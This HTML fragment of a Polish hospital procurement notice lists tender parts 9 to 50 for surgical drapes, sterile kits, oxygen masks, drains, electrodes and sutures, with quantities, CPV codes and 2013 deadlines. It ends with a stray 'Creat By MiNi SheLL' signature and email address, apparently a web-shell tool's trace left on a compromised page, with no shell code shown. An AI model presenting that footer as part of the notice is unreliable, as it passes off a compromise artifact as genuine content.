<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ubranie chirurgiczne (spodnie plus bluza) -500 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Sterylny zestaw do operacji biodra.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sterylny zestaw do operacji biodra -120 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Sterylny zestaw do operacji kolana.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sterylny zestaw do operacji kolana -30 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zestaw do operacji uniwersalny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw do operacji uniwersalny -30 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Sterylna serweta  do zabiegów na dłoni/stopie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sterylna serweta  do zabiegów na dłoni/stopie - 81 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Sterylny zestaw do artroskopii barku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sterylny zestaw do artroskopii barku - 10 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Sterylna serweta z wycięciem U.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sterylna serweta z wycięciem U -110 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Sterylny zestaw do chirurgii odbytnicy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sterylny zestaw do chirurgii odbytnicy - 6 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Sterylna serweta chirurgiczna trójwarstwowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sterylna serweta chirurgiczna trójwarstwowa - 316 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Sterylna serweta chirurgiczna, dwuwarstwowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sterylna serweta chirurgiczna, dwuwarstwowa -40 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Sterylna serweta chirurgiczna trójwarstwowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sterylna serweta chirurgiczna trójwarstwowa -44 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Sterylna ściereczka chłonna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sterylna ściereczka chłonna - 1500 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Sterylny pokrowiec foliowy na przewody.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sterylny pokrowiec foliowy na przewody -140 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Sterylna kieszeń samoprzylepna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sterylna kieszeń samoprzylepna - 150 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Gąbka samoprzylepna, sterylna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Gąbka samoprzylepna, sterylna - 600 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Sterylna osłona na stolik Mayo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sterylna osłona na stolik Mayo -60 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Sterylny rzep.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sterylny rzep - 200 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> Sterylna osłona na aparaturę.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sterylna osłona na aparaturę -240 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> Sterylna samoprzylepna kieszeń.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sterylna samoprzylepna kieszeń - 200 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> Prześcieradło bibułowo-foliowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prześcieradło bibułowo-foliowe - 3100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 28 <b>NAZWA:</b> Sterylna, transparentna folia do obłożenia pola operacyjnego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sterylna, transparentna folia do obłożenia pola operacyjnego -310 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 29 <b>NAZWA:</b> Sterylny worek samoprzylepny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sterylny worek samoprzylepny - 80 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 30 <b>NAZWA:</b> Sterylna serweta z włókniny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sterylna serweta z włókniny - 200 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 31 <b>NAZWA:</b> Sterylna serweta dwuwarstwowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sterylna serweta dwuwarstwowa - 290 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 32 <b>NAZWA:</b> Pościel z włókniny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pościel z włókniny - 13 630 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.30.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 33 <b>NAZWA:</b> Opatrunki przylepne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opatrunki przylepne -300 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.11-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.09.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 34 <b>NAZWA:</b> Plastry.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przylepce chirurgiczne i opatrunkowe - 7508 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.12-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.09.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 35 <b>NAZWA:</b> Maski tlenowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Maski tlenowe dla dorosłych i dla dzieci - 300 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.71.10-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 03.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 36 <b>NAZWA:</b> Materiały medyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Koszyki do usuwania złogów z moczowodu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 03.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 37 <b>NAZWA:</b> Maski tlenowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Maski tlenowe z rezerwuarem i drenem - 360 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.71.10-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 03.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 38 <b>NAZWA:</b> Maski tlenowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Maski tlenowe do tlenoterapii - 180 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.71.10-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 03.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 39 <b>NAZWA:</b> Maski tlenowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Maski tlenowe z nebulizatorem i drenem dla dzieci i dorosłych - 1400 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.71.10-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 03.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 40 <b>NAZWA:</b> Zestawy medyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestawy do aerozoloterapii - 900 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 03.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 41 <b>NAZWA:</b> Dreny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dreny do drenażu dróg żółciowych - 30 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.40-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 03.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 42 <b>NAZWA:</b> Przyrządy używane na salach operacyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dreny histeroskopowe, uszczelki do trokarów, uchwyty elektrody czynnej, przewody elektryczne, elektrody- 88 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.22.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 08.10.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 43 <b>NAZWA:</b> Przyrządy używane na salach operacyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Elektroda neutralna - 410 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.22.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 08.10.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 44 <b>NAZWA:</b> Przyrządy używane na salach operacyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Elektroda do stymulacji endokawitarnej - 12 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.22.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 08.10.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 45 <b>NAZWA:</b> Przyrządy używane na salach operacyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> induktor do implantacji elektrody - 12 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.22.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 08.10.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 46 <b>NAZWA:</b> Zaciski, szwy, podwiązki naczyniowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Monofilamentowy szew wchłanialny syntetyczny- 252 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.20-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 12.11.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 47 <b>NAZWA:</b> Zaciski, szwy, podwiązki naczyniowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szwy antyewentracyjne ze stali nierdzewnej - 48 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.20-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 12.11.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 48 <b>NAZWA:</b> Zaciski, szwy, podwiązki naczyniowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szew do szycia ścięgien techniką Tsugea - 24 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.20-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 12.11.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 49 <b>NAZWA:</b> Zaciski, szwy, podwiązki naczyniowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szew-taśma do szycia narządów miąższowych - 24 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.20-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 12.11.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 50 <b>NAZWA:</b> Zaciski, szwy, podwiązki naczyniowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Siatka do zaopatrywania przepuklin pachwinowych - 10 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.20-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 12.11.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com